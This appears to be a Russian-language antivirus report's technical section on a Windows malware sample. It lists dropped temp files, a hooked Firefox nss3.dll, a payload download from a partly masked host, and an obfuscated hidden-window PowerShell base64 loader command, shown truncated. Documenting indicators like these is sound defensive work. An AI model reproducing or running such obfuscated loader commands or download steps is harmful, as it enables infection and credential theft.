Техническая информация
- '<SYSTEM32>\cmd.exe' /C P^Ow^eRs^HE^ll -e WwBTAHkAcwB0AEUATQAuAFQAZQB4AFQALgBlAG4AQwBvAGQAaQBuAGcAXQA6ADoAdQBuAGkAYwBPAEQARQAuAGcARQB0AFMAdAByAEkATgBnACgAWwBTAHkAcwB0AEUAbQAuAEMATwBuAFYAZQBSAHQAXQA6ADoAZgBSAG8ATQBC...
- %WINDIR%\explorer.exe
- %WINDIR%\syswow64\msiexec.exe
- dgdu_hfd6.exe
- iexplore.exe
- firefox.exe
- Процесс firefox.exe, модуль nss3.dll
- %TEMP%\bit4d18.tmp
- %TEMP%\bit4d18.tmp
- %TEMP%\dgdu_hfd6.exe
- %TEMP%\bit4d18.tmp в %TEMP%\dgdu_hfd6.exe
- 'mo####loa.online':80
- http://mo####loa.online/jss/binss2.jpg
- DNS ASK mo####loa.online
- DNS ASK as####jboston.com
- '%TEMP%\dgdu_hfd6.exe'
- '<SYSTEM32>\cmd.exe' /C P^Ow^eRs^HE^ll -e WwBTAHkAcwB0AEUATQAuAFQAZQB4AFQALgBlAG4AQwBvAGQAaQBuAGcAXQA6ADoAdQBuAGkAYwBPAEQARQAuAGcARQB0AFMAdAByAEkATgBnACgAWwBTAHkAcwB0AEUAbQAuAEMATwBuAFYAZQBSAHQAXQA6ADoAZgBSAG8ATQBC...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBTAHkAcwB0AEUATQAuAFQAZQB4AFQALgBlAG4AQwBvAGQAaQBuAGcAXQA6ADoAdQBuAGkAYwBPAEQARQAuAGcARQB0AFMAdAByAEkATgBnACgAWwBTAHkAcwB0AEUAbQAuAEMATwBuAFYAZQBSAHQAXQA6ADoAZgBSAG8ATQBCAEEAUwBlADYANABzAH...
- '%WINDIR%\syswow64\msiexec.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\dGDU_HfD6.exe"
- '%ProgramFiles(x86)%\mozilla firefox\firefox.exe'